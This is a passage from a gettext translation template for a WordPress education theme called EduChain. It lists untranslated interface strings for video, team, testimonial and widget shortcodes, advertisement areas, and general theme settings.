framework-customizations/theme/options/posts/post.php:118 msgid "Example the Video ID for http://vimeo.com/86323053 is 86323053" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video-carousel/vc_options.php:93 msgid "Set navigation slide to show." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/config.php:6 msgid "SLZ Video" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/config.php:7 msgid "Create video block." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:36 msgid "Set title for video." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:43 msgid "Description for this video." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:48 msgid "Video Type" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:51 msgid "Choose Type of Video." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:59 msgid "" "Example: the Video ID for https://www.youtube.com/watch?v=PDWvcsTloJo is " msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:72 msgid "Example: the Video ID for https://vimeo.com/162913890 is " msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:81 msgid "Add Video Background Image" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:84 msgid "Choose background image to add." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:89 msgid "Video height" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:92 msgid "" "Set height for video. Example: 75% - means video height by 75% video width." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:101 msgid "Choose align for video box" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:106 msgid "Is Popup?" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:109 msgid "Choose to show video as popup." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:114 msgid "Play Text" msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:117 msgid "Enter play text for video." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/vc_options.php:125 msgid "Set border radius for video." msgstr "" #: framework-customizations/extensions/shortcodes/shortcodes/video/views/layout-1.php:148 #: framework-customizations/extensions/shortcodes/shortcodes/video/views/layout-2.php:153 msgid "Video not found." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/config.php:8 msgid "SLZ Teams Block" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/config.php:9 msgid "List of teams" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-1.php:27 #: framework-customizations/extensions/teams/shortcodes/team-block/options/layout-3.php:25 msgid "It is used for ..." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:9 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:16 #: framework-customizations/theme/config.php:537 msgid "Team" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:17 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:27 msgid "-All Team-" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:21 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:31 msgid "-All Team Categories-" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:59 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:57 msgid "Choose team category or special teams to display" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:77 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:75 msgid "Choose Team Category." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:86 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:84 #: framework-customizations/theme/options/template-settings.php:301 msgid "Teams" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:92 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:90 msgid "Add Team" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:95 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:93 msgid "Choose special team to show" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:99 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:97 msgid "" "Default display All Team if no team is selected and Number team is empty." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:114 msgid "Enter content to display button." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:119 msgid "Show Thumbnail" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:123 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:113 msgid "If choose Yes, block will be show thumbnail image." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:128 msgid "Show Position" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:132 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:121 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:84 msgid "If choose Yes, block will be show position." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:137 msgid "Show Contact Info" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:141 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:129 msgid "If choose Yes, block will show contact info." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:146 msgid "Show Social" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:150 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:137 msgid "If choose Yes, block will be show social." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:159 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:145 msgid "If choose Yes, block will be show description." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:166 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:151 msgid "Limit words to display." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:181 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:197 msgid "Choose color title for block." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:182 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:190 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:198 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:206 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:214 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:222 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:230 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:238 msgid "Color Options" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:189 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:205 msgid "Choose color title for block when hover." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:194 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:210 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:213 msgid "Position Color" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:197 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:213 msgid "Choose color position for block." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:202 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:218 msgid "Info Color" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:205 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:221 msgid "Choose color for contact info." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:210 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:226 msgid "Info Hover Color" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:213 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:229 msgid "Choose hover color for contact info." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:221 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:237 msgid "Choose color description for block." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:229 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:245 msgid "Choose color social for block." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:237 #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:253 msgid "Choose color social for block when hover." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:282 msgid "Show Pagination ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:286 msgid "If choose Yes, block will be show pagination." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:290 msgid "Max Posts" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:293 msgid "Add total posts when paging." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:304 msgid "Select order to display list of teams." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:317 msgid "Show Slider" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:321 msgid "If choose Yes, block will be display with slider style." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:322 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:334 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:347 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:360 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:373 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:386 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:398 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:410 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:422 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:434 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:446 #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:458 msgid "Slide Options" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:351 msgid "Show Dots Navigation" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:364 msgid "Show Arrows Navigation" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:414 msgid "Slide Arrow Hover Color" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-block/vc_options.php:438 msgid "Slide Arrow Background Hover Color" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:8 msgid "SLZ Team Carousel" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:9 msgid "List of teams in carousel" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/config.php:34 msgid "Germany" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:20 msgid "1" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:21 msgid "2" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:109 msgid "Show Thumbnail ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:117 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:80 msgid "Show Position ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:125 msgid "Show Contact Info ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:133 msgid "Show Social ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:141 msgid "Show Description ?" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:183 msgid "Enter text to button. If it blank will not have a button." msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:250 msgid "Social Color Hover" msgstr "" #: framework-customizations/extensions/teams/shortcodes/team-carousel/vc_options.php:265 msgid "Choose number of items to show." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:10 msgid "SLZ Testimonial" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/config.php:11 msgid "Slider of testimonials" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:25 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:31 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:26 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:25 msgid "Using featured image in post as background image." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:36 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-1.php:48 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:42 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:37 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:32 msgid "Please choose background color for block" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-2.php:54 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-4.php:49 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-5.php:40 msgid "Please choose border color for block" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:4 msgid "Ankara" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:5 msgid "Bilecik" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/options/layout-6.php:6 msgid "Bolu" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:16 msgid "Testimonial" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:25 msgid "Show Feature Image" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:26 msgid "Show Thumbnail Image" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:31 msgid "-All Testimonial-" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:35 msgid "-All Testimonial Categories-" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:72 msgid "Show Icon Quote ?" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:76 msgid "If choose Yes, block will be show icon quote." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:88 msgid "Show Ratings?" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:92 msgid "If choose Yes, block will be show ratings." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:96 msgid "Avatar Image" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:100 msgid "Select image type for Avatar." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:139 msgid "Choose testimonial category or special testimonials to display." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:157 msgid "Choose Testimonial Category." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:166 msgid "Testimonials" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:172 msgid "Add Testimonial" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:175 msgid "Choose special testimonial to show" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:180 msgid "Default display all testimonials." msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:193 msgid "Quote Color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:195 msgid "Please choose quote color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:207 msgid "Please choose title color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:215 msgid "Please choose position color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:223 msgid "Please choose description color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:236 msgid "Please choose dots color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:248 msgid "Please choose arrows color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:260 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:272 #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:285 msgid "Please choose arrows background color" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:295 msgid "Slides To Show" msgstr "" #: framework-customizations/extensions/testimonials/shortcodes/testimonial/vc_options.php:298 msgid "" "Please input number of item show in slider. Except for Layout India Style " "Pune." msgstr "" #: framework-customizations/extensions/widgets/widgets/button/config.php:7 msgid "slz_btn" msgstr "" #: framework-customizations/extensions/widgets/widgets/button/config.php:8 msgid "SLZ: Button" msgstr "" #: framework-customizations/extensions/widgets/widgets/button/config.php:9 msgid "Add button." msgstr "" #: framework-customizations/extensions/widgets/widgets/button/options.php:12 msgid "Choose layout." msgstr "" #: framework-customizations/extensions/widgets/widgets/button/options.php:19 msgid "Enter button text" msgstr "" #: framework-customizations/extensions/widgets/widgets/button/options.php:24 msgid "Enter button link" msgstr "" #: framework-customizations/extensions/widgets/widgets/button/options.php:29 msgid "Choose align button." msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:25 msgid "Style 1" msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:26 msgid "Style 2" msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:27 msgid "Style 3" msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:28 msgid "Style 4" msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:40 msgid "Category:" msgstr "" #: framework-customizations/extensions/widgets/widgets/category/views/admin.php:46 msgid "Choose category to show" msgstr "" #: framework-customizations/extensions/widgets/widgets/partner/config.php:7 msgid "slz_partner" msgstr "" #: framework-customizations/extensions/widgets/widgets/partner/config.php:8 msgid "SLZ: Partner" msgstr "" #: framework-customizations/extensions/widgets/widgets/partner/config.php:9 msgid "Add Partner." msgstr "" #: framework-customizations/extensions/widgets/widgets/partner/options.php:12 msgid "Choose style." msgstr "" #: framework-customizations/extensions/widgets/widgets/partner/options.php:22 msgid "Upload Images" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:8 msgid "slz_recent_post" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:9 msgid "SLZ: Recent Post" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:10 msgid "A recent posts list" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:14 msgid "Display Thumbnail" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:15 msgid "Display Post Date" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:16 msgid "Display Author" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:17 msgid "Display View" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/config.php:18 msgid "Display Comment" msgstr "" #: framework-customizations/extensions/widgets/widgets/recent-post/views/admin.php:12 msgid "Number Post" msgstr "" #: framework-customizations/theme/class-welcome.php:19 #: includes/class-tgm-plugin-activation.php:2697 #, php-format msgid "Install %2$s" msgstr "" #: framework-customizations/theme/class-welcome.php:19 #: includes/class-tgm-plugin-activation.php:2811 msgid "Install" msgstr "" #: framework-customizations/theme/class-welcome.php:43 #: includes/class-tgm-plugin-activation.php:2708 #, php-format msgid "Activate %2$s" msgstr "" #: framework-customizations/theme/class-welcome.php:43 #: includes/class-tgm-plugin-activation.php:2820 msgid "Activate" msgstr "" #: framework-customizations/theme/class-welcome.php:62 #: includes/class-tgm-plugin-activation.php:2702 #, php-format msgid "Update %2$s" msgstr "" #: framework-customizations/theme/class-welcome.php:62 #: includes/class-tgm-plugin-activation.php:2817 msgid "Update" msgstr "" #: framework-customizations/theme/class-welcome.php:85 #, php-format msgid "Deactivate %2$s" msgstr "" #: framework-customizations/theme/class-welcome.php:85 msgid "Deactivate" msgstr "" #: framework-customizations/theme/config.php:47 msgid "d" msgstr "" #: framework-customizations/theme/config.php:48 msgid "M" msgstr "" #: framework-customizations/theme/config.php:49 msgid "Y" msgstr "" #: framework-customizations/theme/config.php:526 msgid "Portfolio Settings" msgstr "" #: framework-customizations/theme/config.php:527 msgid "Team Settings" msgstr "" #: framework-customizations/theme/config.php:528 msgid "Service Settings" msgstr "" #: framework-customizations/theme/config.php:529 msgid "Recruitment Settings" msgstr "" #: framework-customizations/theme/config.php:530 msgid "Cause Settings" msgstr "" #: framework-customizations/theme/config.php:531 msgid "Event Settings" msgstr "" #: framework-customizations/theme/config.php:532 msgid "FAQ Settings" msgstr "" #: framework-customizations/theme/config.php:533 msgid "Product Settings" msgstr "" #: framework-customizations/theme/config.php:538 msgid "Service" msgstr "" #: framework-customizations/theme/config.php:539 msgid "Recruitment" msgstr "" #: framework-customizations/theme/config.php:540 msgid "Cause" msgstr "" #: framework-customizations/theme/config.php:542 #: framework-customizations/theme/options/template-settings.php:505 msgid "FAQ" msgstr "" #: framework-customizations/theme/config.php:543 msgid "Product" msgstr "" #: framework-customizations/theme/config.php:549 msgid "Font EduChain" msgstr "" #: framework-customizations/theme/config.php:556 msgid "Font Ionicons" msgstr "" #: framework-customizations/theme/config.php:607 msgid "Main Color" msgstr "" #: framework-customizations/theme/config.php:607 msgid "Select the main color" msgstr "" #: framework-customizations/theme/config.php:608 msgid "Gradient Color" msgstr "" #: framework-customizations/theme/config.php:608 msgid "Select the gradient color" msgstr "" #: framework-customizations/theme/manifest.php:80 msgid "EduChain" msgstr "" #: framework-customizations/theme/manifest.php:85 msgid "A basic start that fits all general requirements for almost courses." msgstr "" #: framework-customizations/theme/manifest.php:107 msgid "Market Place" msgstr "" #: framework-customizations/theme/manifest.php:112 msgid "You can create successful market place like udemy, coursera, lynda ..." msgstr "" #: framework-customizations/theme/manifest.php:134 msgid "Less Courses" msgstr "" #: framework-customizations/theme/manifest.php:139 msgid "" "Market place Less Course Suitable for small market place, or lecturers with " "specialized courses." msgstr "" #: framework-customizations/theme/manifest.php:161 msgid "Affiliate" msgstr "" #: framework-customizations/theme/manifest.php:166 msgid "" "Use the impressive interface of EduChain to easily attract students' " "attention to click to link of a market place course." msgstr "" #: framework-customizations/theme/manifest.php:191 msgid "WPBakery Visual Composer" msgstr "" #: framework-customizations/theme/manifest.php:198 msgid "" "Drag and drop page builder for WordPress. Take full control over your " "WordPress site, build any layout you can imagine - no programming knowledge " "required." msgstr "" #: framework-customizations/theme/manifest.php:201 msgid "Solazu Unyson" msgstr "" #: framework-customizations/theme/manifest.php:208 msgid "" "A free drag & drop framework that comes with a bunch of built in extensions " "that will help you develop premium themes fast & easy." msgstr "" #: framework-customizations/theme/manifest.php:218 msgid "" "This is a short description of what the plugin does. It's displayed in the " "WordPress admin area." msgstr "" #: framework-customizations/theme/manifest.php:221 msgid "Lema Subscription" msgstr "" #: framework-customizations/theme/manifest.php:228 #: framework-customizations/theme/manifest.php:238 msgid "One plugin of Learn Master." msgstr "" #: framework-customizations/theme/manifest.php:231 msgid "Lema Affiliate" msgstr "" #: framework-customizations/theme/manifest.php:241 #: framework-customizations/theme/options/posts/page.php:168 msgid "Revolution Slider" msgstr "" #: framework-customizations/theme/manifest.php:248 msgid "Slider Revolution - Premium responsive slider" msgstr "" #: framework-customizations/theme/manifest.php:251 msgid "Newsletter" msgstr "" #: framework-customizations/theme/manifest.php:257 msgid "" "Newsletter is a cool plugin to create your own subscriber list, to send " "newsletters, to build your business." msgstr "" #: framework-customizations/theme/manifest.php:260 msgid "Contact Form 7" msgstr "" #: framework-customizations/theme/manifest.php:266 msgid "Just another contact form plugin. Simple but flexible." msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:7 #: framework-customizations/theme/options/advertisement-settings.php:11 #: framework-customizations/theme/options/advertisement-settings.php:15 msgid "Advertisement" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:17 msgid "" "Click to add new advertisement area. Advertisement area help you to create " "and manager the banner" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:18 msgid "Add Advertisement Area" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:22 msgid "Area Name" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:24 msgid "Input the advertisement area name" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:32 msgid "Display Banner" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:37 msgid "Custom Code" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:47 msgid "Banner Image" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:48 msgid "Upload the banner image .png or .jpg" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:53 msgid "Banner Link" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:54 msgid "Set the banner link." msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:58 msgid "Banner Alt Attribute" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:59 msgid "" "Appears inside the image container when the banner image can not be " "displayed. It helps search engines understand what an banner image is about." msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:64 msgid "Open Link In New Tab" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:65 msgid "Open Link In New Tab?" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:80 msgid "Textarea Option Code" msgstr "" #: framework-customizations/theme/options/advertisement-settings.php:81 msgid "Custom HTML allowed. Paste your ad code here." msgstr "" #: framework-customizations/theme/options/course-settings.php:19 #: framework-customizations/theme/options/course-settings.php:23 msgid "Course Settings" msgstr "" #: framework-customizations/theme/options/course-settings.php:42 msgid "Choose device" msgstr "" #: framework-customizations/theme/options/course-settings.php:45 msgid "Laptop" msgstr "" #: framework-customizations/theme/options/course-settings.php:46 msgid "Phone" msgstr "" #: framework-customizations/theme/options/course-settings.php:49 msgid "Help tip" msgstr "" #: framework-customizations/theme/options/course-settings.php:60 msgid "Memory" msgstr "" #: framework-customizations/theme/options/course-settings.php:62 msgid "16Gb" msgstr "" #: framework-customizations/theme/options/course-settings.php:63 msgid "32Gb" msgstr "" #: framework-customizations/theme/options/course-settings.php:64 msgid "64Gb" msgstr "" #: framework-customizations/theme/options/course-settings.php:75 msgid "Webcam" msgstr "" #: framework-customizations/theme/options/custom-scripts.php:11 #: framework-customizations/theme/options/custom-scripts.php:17 msgid "Custom Scripts" msgstr "" #: framework-customizations/theme/options/custom-scripts.php:18 msgid "Custom Scripts changes that will be applied to the theme" msgstr "" #: framework-customizations/theme/options/custom-styles.php:15 #: framework-customizations/theme/options/custom-styles.php:21 msgid "Custom Styles" msgstr "" #: framework-customizations/theme/options/custom-styles.php:22 msgid "Custom Styles changes that will be applied to the theme" msgstr "" #: framework-customizations/theme/options/footer-settings.php:11 msgid "Footer" msgstr "" #: framework-customizations/theme/options/footer-settings.php:15 #: framework-customizations/theme/options/posts/page.php:205 #: framework-customizations/theme/options/posts/slz-faq.php:82 msgid "Footer Settings" msgstr "" #: framework-customizations/theme/options/general-settings.php:15 msgid "Global Settings" msgstr "" #: framework-customizations/theme/options/general-settings.php:24 msgid "Site Layout" msgstr "" #: framework-customizations/theme/options/general-settings.php:25 msgid "This option will change layout for all pages of theme." msgstr "" #: framework-customizations/theme/options/general-settings.php:62 #: framework-customizations/theme/options/page-boxed-layout.php:38 msgid "Boxed Width" msgstr "" #: framework-customizations/theme/options/general-settings.php:63 #: framework-customizations/theme/options/page-boxed-layout.php:39 msgid "Select the website width" msgstr "" #: framework-customizations/theme/options/general-settings.php:67 #: framework-customizations/theme/options/page-boxed-layout.php:43 msgid "Select the boxed background color" msgstr "" #: framework-customizations/theme/options/general-settings.php:77 #: framework-customizations/theme/options/page-boxed-layout.php:90 msgid "Select background image or try to upload new image." msgstr "" #: framework-customizations/theme/options/general-settings.php:80 #: framework-customizations/theme/options/page-boxed-layout.php:94 msgid "Website Alignment" msgstr "" #: framework-customizations/theme/options/general-settings.php:81 #: framework-customizations/theme/options/page-boxed-layout.php:95 msgid "Choose the website alignment." msgstr "" #: framework-customizations/theme/options/general-settings.php:107 msgid "Has Box Shadow?" msgstr "" #: framework-customizations/theme/options/general-settings.php:108 msgid "Choose YES to enable box shadow." msgstr "" #: framework-customizations/theme/options/general-settings.php:121 msgid "Has Box Border?" msgstr "" #: framework-customizations/theme/options/general-settings.php:122 msgid "Choose YES to enable box border." msgstr "" #: framework-customizations/theme/options/general-settings.php:139 msgid "Site Favicon" msgstr "" #: framework-customizations/theme/options/general-settings.php:140 msgid "Upload the site favicon. Size recommend: 16x16 px." msgstr "" #: framework-customizations/theme/options/general-settings.php:146 msgid "Site Logo Image" msgstr "" #: framework-customizations/theme/options/general-settings.php:147 msgid "Upload the site logo .png or .jpg" msgstr "" #: framework-customizations/theme/options/general-settings.php:154 msgid "Sticky Sidebar" msgstr "" #: framework-customizations/theme/options/general-settings.php:155 msgid "Enable sticky sidebar" msgstr "" #: framework-customizations/theme/options/general-settings.php:173 msgid "Logo Transparent" msgstr "" #: 